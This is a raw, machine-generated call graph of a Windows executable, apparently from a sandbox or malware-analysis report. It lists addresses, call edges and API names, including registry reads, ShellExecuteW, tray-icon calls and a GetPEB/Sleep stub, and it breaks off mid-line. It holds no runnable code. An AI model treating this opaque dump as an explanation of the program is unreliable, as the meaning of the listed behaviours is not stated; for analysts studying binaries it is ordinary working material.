c2f8b5 97770->97771 97772 c2f8a8 97770->97772 97774 c2f8c1 97771->97774 97799 c1f2d9 20 API calls _abort 97771->97799 97798 c1f2d9 20 API calls _abort 97772->97798 97774->97729 97776 c2f8ad 97776->97729 97777 c2f8e2 97800 c227ec 26 API calls pre_c_initialization 97777->97800 97779->97704 97780->97709 97781->97714 97782->97713 97783->97722 97784->97728 97785->97762 97786->97727 97787->97752 97788->97762 97789->97726 97790->97762 97791->97762 97792->97763 97793->97753 97794->97762 97795->97707 97796->97713 97797->97709 97798->97776 97799->97777 97800->97776 97801->97456 97802->97458 97865 c1e4e8 97803->97865 97805 c6275d 97805->97479 97806->97508 97808 c1dbc1 97807->97808 97809 c1dbdd 97807->97809 97808->97809 97810 c1dbe3 97808->97810 97811 c1dbcd 97808->97811 97809->97520 97879 c1d9cc 97810->97879 97882 c1f2d9 20 API calls _abort 97811->97882 97814 c1dbd2 97883 c227ec 26 API calls pre_c_initialization 97814->97883 97817 c1e684 BuildCatchObjectHelperInternal 97816->97817 97818 c1e695 97817->97818 97819 c1e6aa 97817->97819 98035 c1f2d9 20 API calls _abort 97818->98035 97827 c1e6a5 __wsopen_s 97819->97827 98018 c1918d EnterCriticalSection 97819->98018 97821 c1e69a 98036 c227ec 26 API calls pre_c_initialization 97821->98036 97824 c1e6c6 98019 c1e602 97824->98019 97826 c1e6d1 98037 c1e6ee LeaveCriticalSection __fread_nolock 97826->98037 97827->97512 97830 c63013 97829->97830 97831 c62fff SetFileTime CloseHandle 97829->97831 97830->97521 97831->97830 97832->97486 97833->97492 97834->97487 97835->97487 97837 c622e7 97836->97837 97838 c622d9 97836->97838 97868 c1e469 97865->97868 97867 c1e505 97867->97805 97869 c1e478 97868->97869 97870 c1e48c 97868->97870 97876 c1f2d9 20 API calls _abort 97869->97876 97875 c1e488 __alldvrm 97870->97875 97878 c2333f 11 API calls 2 library calls 97870->97878 97873 c1e47d 97877 c227ec 26 API calls pre_c_initialization 97873->97877 97875->97867 97876->97873 97877->97875 97878->97875 97884 c1d97b 97879->97884 97882->97814 97883->97809 97885 c1d987 BuildCatchObjectHelperInternal 97884->97885 97892 c1918d EnterCriticalSection 97885->97892 97887 c1d995 97893 c1d9f4 97887->97893 97892->97887 97901 c249a1 97893->97901 98018->97824 98020 c1e624 98019->98020 98021 c1e60f 98019->98021 98024 c1dc0b 62 API calls 98020->98024 98027 c1e61f 98020->98027 98057 c1f2d9 20 API calls _abort 98021->98057 98023 c1e614 98058 c227ec 26 API calls pre_c_initialization 98023->98058 98026 c1e638 98024->98026 98038 c24d7a 98026->98038 98027->97826 98035->97821 98036->97827 98037->97827 98057->98023 98058->98027 98114 bf33fe _wcslen 98113->98114 98115 c3311d 98114->98115 98116 bf3411 98114->98116 98118 c0fddb 22 API calls 98115->98118 98117 bfa587 22 API calls 98116->98117 98119 bf341e __fread_nolock 98117->98119 98120 c33127 98118->98120 98119->97532 98121 c0fe0b 22 API calls 98120->98121 98122 c33157 __fread_nolock 98121->98122 98124 c3f545 98123->98124 98125 bf9c7e 98123->98125 98126 bf6b57 22 API calls 98124->98126 98129 c3f556 98124->98129 98128 c0fddb 22 API calls 98125->98128 98126->98129 98127 bfa6c3 22 API calls 98130 c3f560 98127->98130 98131 bf9c91 98128->98131 98129->98127 98130->98130 98132 bf9cac 98131->98132 98133 bf9c9a 98131->98133 98135 bfa961 22 API calls 98132->98135 98134 bf9cb3 22 API calls 98133->98134 98136 bf9ca2 98134->98136 98135->98136 98136->96987 98136->96991 98138 c0fe0b 22 API calls 98137->98138 98139 bf6295 98138->98139 98140 c0fddb 22 API calls 98139->98140 98141 bf62a3 98140->98141 98142 c0f141 98141->98142 98143 c0f188 98142->98143 98144 c0f14c 98142->98144 98145 bfa6c3 22 API calls 98143->98145 98144->98143 98146 c0f15b 98144->98146 98153 c5caeb 98145->98153 98148 c0f170 98146->98148 98150 c0f17d 98146->98150 98147 c5cb1a 98147->97024 98164 c0f18e 98148->98164 98171 c5cbf2 26 API calls 98150->98171 98153->98147 98172 c5ca89 ReadFile SetFilePointerEx 98153->98172 98173 bf49bd 22 API calls __fread_nolock 98153->98173 98154 c0f179 98154->97024 98156->97034 98157->97031 98158->97033 98159->97039 98160->96991 98161->96991 98162->97025 98163->97029 98174 c0f1d8 98164->98174 98170 c0f1c1 98170->98154 98171->98154 98172->98153 98173->98153 98175 c0fe0b 22 API calls 98174->98175 98176 c0f1ef 98175->98176 98177 c0fddb 22 API calls 98176->98177 98178 c0f1a6 98177->98178 98179 bf97b6 98178->98179 98186 bf9a1e 98179->98186 98181 bf9a40 2 API calls 98183 bf97c7 98181->98183 98182 bf97fc 98182->98170 98185 bf6e14 24 API calls 98182->98185 98183->98181 98183->98182 98193 bf9b01 22 API calls __fread_nolock 98183->98193 98185->98170 98187 bf9a2f 98186->98187 98188 c3f378 98186->98188 98187->98183 98189 c0fddb 22 API calls 98188->98189 98190 c3f382 98189->98190 98191 c0fe0b 22 API calls 98190->98191 98192 c3f397 98191->98192 98193->98183 98195 bf6270 22 API calls 98194->98195 98221 bf9eb5 98195->98221 98196 bf9fd2 98223 bfa4a1 22 API calls __fread_nolock 98196->98223 98198 bf9fec 98198->97045 98201 c3f7c4 98228 c596e2 84 API calls __wsopen_s 98201->98228 98202 c3f699 98209 c0fddb 22 API calls 98202->98209 98204 bfa405 98204->98198 98230 c596e2 84 API calls __wsopen_s 98204->98230 98206 bfa4a1 22 API calls 98206->98221 98208 bfa6c3 22 API calls 98208->98221 98211 c3f754 98209->98211 98210 c3f7d2 98229 bfa4a1 22 API calls __fread_nolock 98210->98229 98214 c0fe0b 22 API calls 98211->98214 98213 c3f7e8 98213->98198 98216 bfa12c __fread_nolock 98214->98216 98216->98201 98216->98204 98217 bfa587 22 API calls 98217->98221 98218 bfaec9 22 API calls 98219 bfa0db CharUpperBuffW 98218->98219 98224 bfa673 22 API calls 98219->98224 98221->98196 98221->98201 98221->98202 98221->98204 98221->98206 98221->98208 98221->98216 98221->98217 98221->98218 98222 bf4573 41 API calls _wcslen 98221->98222 98225 bf48c8 23 API calls 98221->98225 98226 bf49bd 22 API calls __fread_nolock 98221->98226 98227 bfa673 22 API calls 98221->98227 98222->98221 98223->98198 98224->98221 98225->98221 98226->98221 98227->98221 98228->98210 98229->98213 98230->98198 98231->97058 98232->97061 98233->97065 98234 c42a00 98238 bfd7b0 messages 98234->98238 98235 bfd9d5 98236 bfdb11 PeekMessageW 98236->98238 98237 bfd807 GetInputState 98237->98236 98237->98238 98238->98235 98238->98236 98238->98237 98239 c41cbe TranslateAcceleratorW 98238->98239 98241 bfdb8f PeekMessageW 98238->98241 98242 bfdb73 TranslateMessage DispatchMessageW 98238->98242 98243 bfda04 timeGetTime 98238->98243 98244 bfdbaf Sleep 98238->98244 98246 c42b74 Sleep 98238->98246 98247 c41dda timeGetTime 98238->98247 98262 bfec40 256 API calls 98238->98262 98263 c01310 256 API calls 98238->98263 98266 bfdd50 98238->98266 98273 bfdfd0 98238->98273 98296 bfbf40 98238->98296 98354 c0edf6 IsDialogMessageW GetClassLongW 98238->98354 98356 c63a2a 23 API calls 98238->98356 98357 c6359c 82 API calls __wsopen_s 98238->98357 98239->98238 98241->98238 98242->98241 98243->98238 98245 bfdbc0 98244->98245 98245->98235 98245->98238 98248 c0e551 timeGetTime 98245->98248 98251 c42c0b GetExitCodeProcess 98245->98251 98255 c42a31 98245->98255 98256 c829bf GetForegroundWindow 98245->98256 98257 c42ca9 Sleep 98245->98257 98358 c75658 23 API calls 98245->98358 98359 c5e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98245->98359 98360 c5d4dc 47 API calls 98245->98360 98246->98245 98355 c0e300 23 API calls 98247->98355 98248->98245 98253 c42c37 CloseHandle 98251->98253 98254 c42c21 WaitForSingleObject 98251->98254 98253->98245 98254->98238 98254->98253 98255->98235 98256->98245 98257->98238 98262->98238 98263->98238 98267 bfdd6f 98266->98267 98268 bfdd83 98266->98268 98361 bfd260 256 API calls 2 library calls 98267->98361 98362 c6359c 82 API calls __wsopen_s 98268->98362 98270 bfdd7a 98270->98238 98272 c42f75 98272->98272 98277 bfe010 98273->98277 98276 c42fca 98280 bfa961 22 API calls 98276->98280 98291 bfe0dc messages 98276->98291 98277->98291 98365 c10242 5 API calls __Init_thread_wait 98277->98365 98278 bfa961 22 API calls 98278->98291 98279 c6359c 82 API calls 98279->98291 98283 c42fe4 98280->98283 98366 c100a3 29 API calls __onexit 98283->98366 98285 c42fee 98367 c101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98285->98367 98289 bfa8c7 22 API calls 98289->98291 98290 bfec40 256 API calls 98290->98291 98291->98278 98291->98279 98291->98289 98291->98290 98292 bfe3e1 98291->98292 98293 c004f0 22 API calls 98291->98293 98363 bfa81b 41 API calls 98291->98363 98364 c0a308 256 API calls 98291->98364 98368 c10242 5 API calls __Init_thread_wait 98291->98368 98369 c100a3 29 API calls __onexit 98291->98369 98370 c101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98291->98370 98371 c747d4 256 API calls 98291->98371 98372 c768c1 256 API calls 98291->98372 98292->98238 98293->98291 98373 bfadf0 98296->98373 98298 bfbf9d 98299 c404b6 98298->98299 98300 bfbfa9 98298->98300 98392 c6359c 82 API calls __wsopen_s 98299->98392 98302 bfc01e 98300->98302 98303 c404c6 98300->98303 98378 bfac91 98302->98378 98393 c6359c 82 API calls __wsopen_s 98303->98393 98307 bfc7da 98310 c0fe0b 22 API calls 98307->98310 98316 bfc808 __fread_nolock 98310->98316 98313 c404f5 98315 c4055a 98313->98315 98394 c0d217 256 API calls 98313->98394 98340 bfc603 98315->98340 98395 c6359c 82 API calls __wsopen_s 98315->98395 98321 c0fe0b 22 API calls 98316->98321 98317 bfec40 256 API calls 98325 bfc039 __fread_nolock messages 98317->98325 98318 c0fddb 22 API calls 98318->98325 98319 c57120 22 API calls 98319->98325 98320 c4091a 98405 c63209 23 API calls 98320->98405 98352 bfc350 __fread_nolock messages 98321->98352 98322 bfaf8a 22 API calls 98322->98325 98325->98307 98325->98313 98325->98315 98325->98316 98325->98317 98325->98318 98325->98319 98325->98320 98325->98322 98326 c408a5 98325->98326 98330 c40591 98325->98330 98331 c408f6 98325->98331 98337 bfc237 98325->98337 98325->98340 98346 c409bf 98325->98346 98348 bfbbe0 40 API calls 98325->98348 98351 c0fe0b 22 API calls 98325->98351 98382 bfad81 98325->98382 98397 c57099 22 API calls __fread_nolock 98325->98397 98398 c75745 54 API calls _wcslen 98325->98398 98399 c0aa42 22 API calls messages 98325->98399 98400 c5f05c 40 API calls 98325->98400 98401 bfa993 41 API calls 98325->98401 98402 bfaceb 23 API calls messages 98325->98402 98327 bfec40 256 API calls 98326->98327 98329 c408cf 98327->98329 98329->98340 98403 bfa81b 41 API calls 98329->98403 98396 c6359c 82 API calls __wsopen_s 98330->98396 98404 c6359c 82 API calls __wsopen_s 98331->98404 98338 bfc253 98337->98338 98339 bfa8c7 22 API calls 98337->98339 98341 c40976 98338->98341 98344 bfc297 messages 98338->98344 98339->98338 98340->98238 98406 bfaceb 23 API calls messages 98341->98406 98344->98346 98389 bfaceb 23 API calls messages 98344->98389 98346->98340 98407 c6359c 82 API calls __wsopen_s 98346->98407 98347 bfc335 98347->98346 98349 bfc342 98347->98349 98348->98325 98390 bfa704 22 API calls messages 98349->98390 98351->98325 98353 bfc3ac 98352->98353 98391 c0ce17 22 API calls messages 98352->98391 98353->98238 98354->98238 98355->98238 98356->98238 98357->98238 98358->98245 98359->98245 98360->98245 98361->98270 98362->98272 98363->98291 98364->98291 98365->98276 98366->98285 98367->98291 98368->98291 98369->98291 98370->98291 98371->98291 98372->98291 98374 bfae01 98373->98374 98377 bfae1c messages 98373->98377 98375 bfaec9 22 API calls 98374->98375 98376 bfae09 CharUpperBuffW 98375->98376 98376->98377 98377->98298 98379 bfacae 98378->98379 98380 bfacd1 98379->98380 98408 c6359c 82 API calls __wsopen_s 98379->98408 98380->98325 98383 c3fadb 98382->98383 98384 bfad92 98382->98384 98385 c0fddb 22 API calls 98384->98385 98386 bfad99 98385->98386 98409 bfadcd 98386->98409 98389->98347 98390->98352 98391->98352 98392->98303 98393->98340 98394->98315 98395->98340 98396->98340 98397->98325 98398->98325 98399->98325 98400->98325 98401->98325 98402->98325 98403->98331 98404->98340 98405->98337 98406->98346 98407->98340 98408->98380 98412 bfaddd 98409->98412 98410 bfadb6 98410->98325 98411 c0fddb 22 API calls 98411->98412 98412->98410 98412->98411 98413 bfa961 22 API calls 98412->98413 98414 bfa8c7 22 API calls 98412->98414 98415 bfadcd 22 API calls 98412->98415 98413->98412 98414->98412 98415->98412 98416 bf105b 98421 bf344d 98416->98421 98418 bf106a 98452 c100a3 29 API calls __onexit 98418->98452 98420 bf1074 98422 bf345d __wsopen_s 98421->98422 98423 bfa961 22 API calls 98422->98423 98424 bf3513 98423->98424 98453 bf3a5a 98424->98453 98426 bf351c 98460 bf3357 98426->98460 98429 bf33c6 22 API calls 98430 bf3535 98429->98430 98466 bf515f 98430->98466 98433 bfa961 22 API calls 98434 bf354d 98433->98434 98435 bfa6c3 22 API calls 98434->98435 98436 bf3556 RegOpenKeyExW 98435->98436 98437 c33176 RegQueryValueExW 98436->98437 98442 bf3578 98436->98442 98438 c33193 98437->98438 98439 c3320c RegCloseKey 98437->98439 98440 c0fe0b 22 API calls 98438->98440 98439->98442 98451 c3321e _wcslen 98439->98451 98441 c331ac 98440->98441 98443 bf5722 22 API calls 98441->98443 98442->98418 98444 c331b7 RegQueryValueExW 98443->98444 98446 c331d4 98444->98446 98448 c331ee messages 98444->98448 98445 bf4c6d 22 API calls 98445->98451 98447 bf6b57 22 API calls 98446->98447 98447->98448 98448->98439 98449 bf9cb3 22 API calls 98449->98451 98450 bf515f 22 API calls 98450->98451 98451->98442 98451->98445 98451->98449 98451->98450 98452->98420 98472 c31f50 98453->98472 98456 bf9cb3 22 API calls 98457 bf3a8d 98456->98457 98474 bf3aa2 98457->98474 98459 bf3a97 98459->98426 98461 c31f50 __wsopen_s 98460->98461 98462 bf3364 GetFullPathNameW 98461->98462 98463 bf3386 98462->98463 98464 bf6b57 22 API calls 98463->98464 98465 bf33a4 98464->98465 98465->98429 98467 bf516e 98466->98467 98468 bf518f __fread_nolock 98466->98468 98470 c0fe0b 22 API calls 98467->98470 98469 c0fddb 22 API calls 98468->98469 98471 bf3544 98469->98471 98470->98468 98471->98433 98473 bf3a67 GetModuleFileNameW 98472->98473 98473->98456 98475 c31f50 __wsopen_s 98474->98475 98476 bf3aaf GetFullPathNameW 98475->98476 98477 bf3ace 98476->98477 98478 bf3ae9 98476->98478 98479 bf6b57 22 API calls 98477->98479 98480 bfa6c3 22 API calls 98478->98480 98481 bf3ada 98479->98481 98480->98481 98484 bf37a0 98481->98484 98485 bf37ae 98484->98485 98486 bf93b2 22 API calls 98485->98486 98487 bf37c2 98486->98487 98487->98459 98488 c43a41 98492 c610c0 98488->98492 98490 c43a4c 98491 c610c0 53 API calls 98490->98491 98491->98490 98493 c610fa 98492->98493 98498 c610cd 98492->98498 98493->98490 98494 c610fc 98504 c0fa11 53 API calls 98494->98504 98496 c61101 98497 bf7510 53 API calls 98496->98497 98499 c61108 98497->98499 98498->98493 98498->98494 98498->98496 98501 c610f4 98498->98501 98500 bf6350 22 API calls 98499->98500 98500->98493 98503 bfb270 39 API calls 98501->98503 98503->98493 98504->98496 98505 b623f0 98519 b60000 98505->98519 98507 b6249f 98522 b622e0 98507->98522 98525 b634e0 GetPEB 98519->98525 98521 b6068b 98521->98507 98523 b622e9 Sleep 98522->98523 98524 b622f7 98523->98524 98526 b6350a 98525->98526 98526->98521 98527 c32ba5 98528 bf2b25 98527->98528 98529 c32baf 98527->98529 98555 bf2b83 7 API calls 98528->98555 98531 bf3a5a 24 API calls 98529->98531 98533 c32bb8 98531->98533 98535 bf9cb3 22 API calls 98533->98535 98537 c32bc6 98535->98537 98536 bf2b2f 98547 bf2b44 98536->98547 98559 bf3837 98536->98559 98538 c32bf5 98537->98538 98539 c32bce 98537->98539 98540 bf33c6 22 API calls 98538->98540 98542 bf33c6 22 API calls 98539->98542 98543 c32bf1 GetForegroundWindow ShellExecuteW 98540->98543 98544 c32bd9 98542->98544 98549 c32c26 98543->98549 98548 bf6350 22 API calls 98544->98548 98546 bf2b5f 98553 bf2b66 SetCurrentDirectoryW 98546->98553 98547->98546 98569 bf30f2 Shell_NotifyIconW ___scrt_fastfail 98547->98569 98551 c32be7 98548->98551 98549->98546 98552 bf33c6 22 API calls 98551->98552 98552->98543 98554 bf2b7a 98553->98554 98570 bf2cd4 7 API calls 98555->98570 98557 bf2b2a 98558 bf2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98557->98558 98558->98536 98560 bf3862 ___scrt_fastfail 98559->98560 98571 bf4212 98560->98571 98564 c33386 Shell_NotifyIconW 98565 bf3906 Shell_NotifyIconW 98575 bf3923 98565->98575 98567 bf38e8 98567->98564 98567->98565 98568 bf391c 98568->98547 98569->98546 98570->98557 98572 c335a4 98571->98572 98573 bf38b7 98571->98573 98572->98573 98574 c335ad DestroyIcon 98572->98574 98573->98567 98597 c5c874 42 API calls 98573->98597 98574->98573 98576 bf393f 98575->98576 98595 bf3a13 98575->98595 98577 bf6270 22 API calls 98576->98577 98578 bf394d 98577->98578 98579 c33393 LoadStringW 98578->98579 98580 bf395a 98578->98580 98583 c333ad 98579->98583 98581 bf6b57 22 API calls 98580->98581 98582 bf396f 98581->98582 98584 bf397c 98582->98584 98585 c333c9 98582->98585 98586 bfa8c7 22 API calls 98583->98586 98590 bf3994 ___scrt_fastfail 98583->98590 98584->98583 98587 bf3986 98584->98587 98588 bf6350 22 API calls 98585->98588 98586->98590 98589 bf6350 22 API calls 98587->98589 98591 c333d7 98588->98591 98589->98590 98593 bf39f9 Shell_NotifyIconW 98590->98593 98591->98590 98592 bf33c6 22 API calls 98591->98592 98594 c333f9 98592->98594 98593->98595 98596 bf33c6 22 API calls 98594->98596 98595->98568 98596->98590 98597->98567 98598 bf1098 98603 bf42de 98598->98603 98602 bf10a7 98604 bfa961 22 API calls 98603->98604 98605 bf42f5 GetVersionExW 98604->98605 98606 bf6b57 22 API calls 98605->98606 98607 bf4342 98606->98607 98608 bf93b2 22 API calls 98607->98608 98620 bf4378 98607->98620 98609 bf436c 98608->98609 98611 bf37a0 22 API calls 98609->98611 98610 bf441b GetCurrentProcess IsWow64Process 98612 bf4437 98610->98612 98611->98620 98613 bf444f LoadLibraryA 98612->98613 98614 c33824 GetSystemInfo 98612->98614 98615 bf449c GetSystemInfo 98613->98615 98616 bf4460 GetProcAddress 98613->98616 98619 bf4476 98615->98619 98616->98615 98618 bf4470 GetNativeSystemInfo 98616->98618 98617 c337df 98618->98619 98621 bf447a FreeLibrary 98619->98621 98622 bf109d 98619->98622 98620->98610 98620->98617 98621->98622 98623 c100a3 29 API calls __onexit 98622->98623 98623->98602 98624 bf2e37 98625 bfa961 22 API calls 98624->98625 98626 bf2e4d 98625->98626 98703 bf4ae3 98626->98703 98628 bf2e6b 98629 bf3a5a 24 API calls 98628->98629 98630 bf2e7f 98629->98630 98631 bf9cb3 22 API calls 98630->98631 98632 bf2e8c 98631->98632 98633 bf4ecb 94 API calls 98632->98633 98634 bf2ea5 98633->98634 98635 bf2ead 98634->98635 98636 c32cb0 98634->98636 98639 bfa8c7 22 API calls 98635->98639 98733 c62cf9 98636->98733 98638 c32cc3 98640 c32ccf 98638->98640 98642 bf4f39 68 API calls 98638->98642 98641 bf2ec3 98639->98641 98644 bf4f39 68 API calls 98640->98644 98717 bf6f88 22 API calls 98641->98717 98642->98640 98646 c32ce5 98644->98646 98645 bf2ecf 98647 bf9cb3 22 API calls 98645->98647 98759 bf3084 22 API calls 98646->98759 98648 bf2edc 98647->98648 98718 bfa81b 41 API calls 98648->98718 98651 bf2eec 98653 bf9cb3 22 API calls 98651->98653 98652 c32d02 98760 bf3084 22 API calls 98652->98760 98655 bf2f12 98653->98655 98719 bfa81b 41 API calls 98655->98719 98656 c32d1e 98658 bf3a5a 24 API calls 98656->98658 98660 c32d44 98658->98660 98659 bf2f21 98663 bfa961 22 API calls 98659->98663 98761 bf3084 22 API calls 98660->98761 98662 c32d50 98664 bfa8c7 22 API calls 98662->98664 98665 bf2f3f 98663->98665 98666 c32d5e 98664->98666 98720 bf3084 22 API calls 98665->98720 98762 bf3084 22 API calls 98666->98762 98669 bf2f4b 98721 c14a28 40 API calls 2 library calls 98669->98721 98670 c32d6d 98674 bfa8c7 22 API calls 98670->98674 98672 bf2f59 98672->98646 98673 bf2f63 98672->98673 98722 c14a28 40 API calls 2 library calls 98673->98722 98676 c32d83 98674->98676 98763 bf3084 22 API calls 98676->98763 98677 bf2f6e 98677->98652 98679 bf2f78 98677->98679 98723 c14a28 40 API calls 2 library calls 98679->98723 98680 c32d90 98682 bf2f83 98682->98656 98683 bf2f8d 98682->98683 98724 c14a28 40 API calls 2 library calls 98683->98724 98685 bf2f98 98686 bf2fdc 98685->98686 98725 bf3084 22 API calls 98685->98725 98686->98670 98687 bf2fe8 98686->98687 98687->98680 98727 bf63eb 22 API calls 98687->98727 98689 bf2fbf 98692 bfa8c7 22 API calls 98689->98692 98691 bf2ff8 98728 bf6a50 22 API calls 98691->98728 98694 bf2fcd 98692->98694 98726 bf3084 22 API calls 98694->98726 98695 bf3006 98729 bf70b0 23 API calls 98695->98729 98698 bf3021 98701 bf3065 98698->98701 98730 bf6f88 22 API calls 98698->98730 98731 bf70b0 23 API calls 98698->98731 98732 bf3084 22 API calls 98698->98732 98704 bf4af0 __wsopen_s 98703->98704 98705 bf6b57 22 API calls 98704->98705 98706 bf4b22 98704->98706 98705->98706 98707 bf4c6d 22 API calls 98706->98707 98716 bf4b58 98706->98716 98707->98706 98708 bf4c29 98709 bf9cb3 22 API calls 98708->98709 98712 bf4c5e 98708->98712 98711 bf4c52 98709->98711 98710 bf9cb3 22 API calls 98710->98716 98713 bf515f 22 API calls 98711->98713 98712->98628 98713->98712 98714 bf4c6d 22 API calls 98714->98716 98715 bf515f 22 API calls 98715->98716 98716->98708 98716->98710 98716->98714 98716->98715 98717->98645 98718->98651 98719->98659 98720->98669 98721->98672 98722->98677 98723->98682 98724->98685 98725->98689 98726->98686 98727->98691 98728->98695 98729->98698 98730->98698 98731->98698 98732->98698 98734 c62d15 98733->98734 98735 bf511f 64 API calls 98734->98735 98736 c62d29 98735->98736 98764 c62e66 75 API calls 98736->98764 98738 c62d3b 98739 bf50f5 40 API calls 98738->98739 98756 c62d3f 98738->98756 98740 c62d56 98739->98740 98741 bf50f5 40 API calls 98740->98741 98742 c62d66 98741->98742 98743 bf50f5 40 API calls 98742->98743 98744 c62d81 98743->98744 98745 bf50f5 40 API calls 98744->98745 98746 c62d9c 98745->98746 98747 bf511f 64 API calls 98746->98747 98748 c62db3 98747->98748 98749 c1ea0c ___std_exception_copy 21 API calls 98748->98749 98750 c62dba 98749->98750 98751 c1ea0c ___std_exception_copy 21 API calls 98750->98751 98752 c62dc4 98751->98752 98753 bf50f5 40 API calls 98752->98753 98754 c62dd8 98753->98754 98765 c628fe 27 API calls 98754->98765 98756->98638 98757 c62dee 98757->98756 98758 c622ce 79 API calls 98757->98758 98758->98756 98759->98652 98760->98656 98761->98662 98762->98670 98763->98680 98764->98738 98765->98757 98766 bf3156 98769 bf3170 98766->98769 98770 bf3187 98769->98770 98771 bf318c 98770->98771 98772 bf31eb 98770->98772 98773 bf31e9 98770->98773 98774 bf3199 98771->98774 98775 bf3265 PostQuitMessage 98771->98775 98777 c32dfb 98772->98777 98778 bf31f1 98772->98778 98776 bf31d0 DefWindowProcW 98773->98776 98780 bf31a4 98774->98780 98781 c32e7c 98774->98781 98782 bf316a 98775->98782 98776->98782 98818 bf18e2 10 API calls 98777->98818 98783 bf321d SetTimer RegisterWindowMessageW 98778->98783 98784 bf31f8 98778->98784 98786 bf31ae 98780->98786 98787 c32e68 98780->98787 98823 c5bf30 34 API calls ___scrt_fastfail 98781->98823 98783->98782 98788 bf3246 CreatePopupMenu 98783->98788 98790 bf3201 KillTimer 98784->98790 98791 c32d9c 98784->98791 98785 c32e1c 98819 c0e499 42 API calls 98785->98819 98794 bf31b9 98786->98794 98795 c32e4d 98786->98795 98822 c5c161 27 API calls ___scrt_fastfail 98787->98822 98788->98782 98814 bf30f2 Shell_NotifyIconW ___scrt_fastfail 98790->98814 98797 c32da1 98791->98797 98798 c32dd7 MoveWindow 98791->98798 98801 bf31c4 98794->98801 98802 bf3253 98794->98802 98795->98776 98821 c50ad7 22 API calls 98795->98821 98796 c32e8e 98796->98776 98796->98782 98803 c32da7 98797->98803 98804 c32dc6 SetFocus 98797->98804 98798->98782 98800 bf3263 98800->98782 98801->98776 98820 bf30f2 Shell_NotifyIconW ___scrt_fastfail 98801->98820 98816 bf326f 44 API calls ___scrt_fastfail 98802->98816 98803->98801 98808 c32db0 98803->98808 98804->98782 98805 bf3214 98815 bf3c50 DeleteObject DestroyWindow 98805->98815 98817 bf18e2 10 API calls 98808->98817 98812 c32e41 98813 bf3837 49 API calls 98812->98813 98813->98773 98814->98805 98815->98782 98816->98800 98817->98782 98818->98785 98819->98801 98820->98812 98821->98773 98822->98800 98823->98796 98824 bf1033 98829 bf4c91 98824->98829 98828 bf1042 98830 bfa961 22 API calls 98829->98830 98831 bf4cff 98830->98831 98838 bf3af0 98831->98838 98833 c33cb6 98835 bf4d9c 98835->98833 98836 bf1038 98835->98836 98841 bf51f7 22 API calls __fread_nolock 98835->98841 98837 c100a3 29 API calls __onexit 98836->98837 98837->98828 98842 bf3b1c 98838->98842 98841->98835 98843 bf3b0f 98842->98843 98844 bf3b29 98842->98844 98843->98835 98844->98843 98845 bf3b30 RegOpenKeyExW 98844->98845 98845->98843 98846 bf3b4a RegQueryValueExW 98845->98846 98847 bf3b80 RegCloseKey 98846->98847 98848 bf3b6b 98846->98848 98847->98843 98848->98847 98849 bfdf10 98852 bfb710 98849->98852 98853 bfb72b 98852->98853 98854 c40146 98853->98854 98855 c400f8 98853->98855 98862 bfb750 98853->98862 98894 c758a2 256 API calls 2 library calls 98854->98894 98858 c40102 98855->98858 98860 c4010f 98855->98860 98855->98862 98892 c75d33 256 API calls 98858->98892 98878 bfba20 98860->98878 98893 c761d0 256 API calls 2 library calls 98860->98893 98866 bfbbe0 40 API calls 98862->98866 98869 bfba4e 98862->98869 98871 c40322 98862->98871 98862->98878 98879 c0d336 40 API calls 98862->98879 98880 bfec40 256 API calls 98862->98880 98881 bfa8c7 22 API calls 98862->98881 98883 bfa81b 41 API calls 98862->98883 98884 c0d2f0 40 API calls 98862->98884 98885 c0a01b 256 API calls 98862->98885 98886 c10242 5 API calls __Init_thread_wait 98862->98886 98887 c0edcd 22 API calls 98862->98887 98888 c100a3 29 API calls __onexit 98862->98888 98889 c101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98862->98889 98890 c0ee53 82 API calls 98862->98890 98891 c0e5ca 256 API calls 98862->98891 98895 bfaceb 23 API calls messages 98862->98895 98896 c4f6bf 23 API calls 98862->98896 98866->98862 98867 c403d9 98867->98867 98897 c75c0c 82 API calls 98871->98897 98878->98869 98898 c6359c 82 API calls __wsopen_s 98878->98898 98879->98862 98880->98862 98881->98862 98883->98862 98884->98862 98885->98862 98886->98862 98887->98862 98888->98862 98889->98862 98890->98862 98891->98862 98892->98860 98893->98878 98894->98862 98895->98862 98896->98862 98897->98878 98898->98867 98899 c43f75 98910 c0ceb1 98899->98910 98901 c43f8b 98902 c44006 98901->98902 98919 c0e300 23 API calls 98901->98919 98905 bfbf40 256 API calls 98902->98905 98904 c43fe6 98907 c44052 98904->98907 98920 c61abf 22 API calls 98904->98920 98905->98907 98908 c44a88 98907->98908 98921 c6359c 82 API calls __wsopen_s 98907->98921 98911 c0ced2 98910->98911 98912 c0cebf 98910->98912 98913 c0cf05 98911->98913 98914 c0ced7 98911->98914 98922 bfaceb 23 API calls messages 98912->98922 98923 bfaceb 23 API calls messages 98913->98923 98916 c0fddb 22 API calls 98914->98916 98918 c0cec9 98916->98918 98918->98901 98919->98904 98920->98902 98921->98908 98922->98918 98923->98918 98924 bf1cad SystemParametersInfoW 98925 c290fa 98926 c29107 98925->98926 98930 c2911f 98925->98930 98975 c1f2d9 20 API calls _abort 98926->98975 98928 c2910c 98976 c227ec 26 API calls pre_c_initialization 98928->98976 98931 c2917a 98930->98931 98939 c29117 98930->98939 98977 c2fdc4 21 API calls 2 library calls 98930->98977 98933 c1d955 __fread_nolock 26 API calls 98931->98933 98934 c29192 98933->98934 98945 c28c32 98934->98945 98936 c29199 98937 c1d955 __fread_nolock 26 API calls 98936->98937 98936->98939 98938 c291c5 98937->98938 98938->98939 98940 c1d955 __fread_nolock 26 API calls 98938->98940 98941 c291d3 98940->98941 98941->98939 98942 c1d955 __fread_nolock 26 API calls 98941->98942 98943 c291e3 98942->98943 98944 c1d955 __fread_nolock 26 API calls 98943->98944 98944->98939 98946 c28c3e BuildCatchObjectHelperInternal 98945->98946 98947 c28c46 98946->98947 98948 c28c5e 98946->98948 98979 c1f2c6 20 API calls _abort 98947->98979 98950 c28d24 98948->98950 98954 c28c97 98948->98954 98986 c1f2c6 20 API calls _abort 98950->98986 98951 c28c4b 98980 c1f2d9 20 API calls _abort 98951->98980 98956 c28ca6 98954->98956 98957 c28cbb 98954->98957 98955 c28d29 98987 c1f2d9 20 API calls _abort 98955->98987 98981 c1f2c6 20 API calls _abort 98956->98981 98978 c25147 EnterCriticalSection 98957->98978 98959 c28cb3 98988 c227ec 26 API calls pre_c_initialization 98959->98988 98962 c28cc1 98964 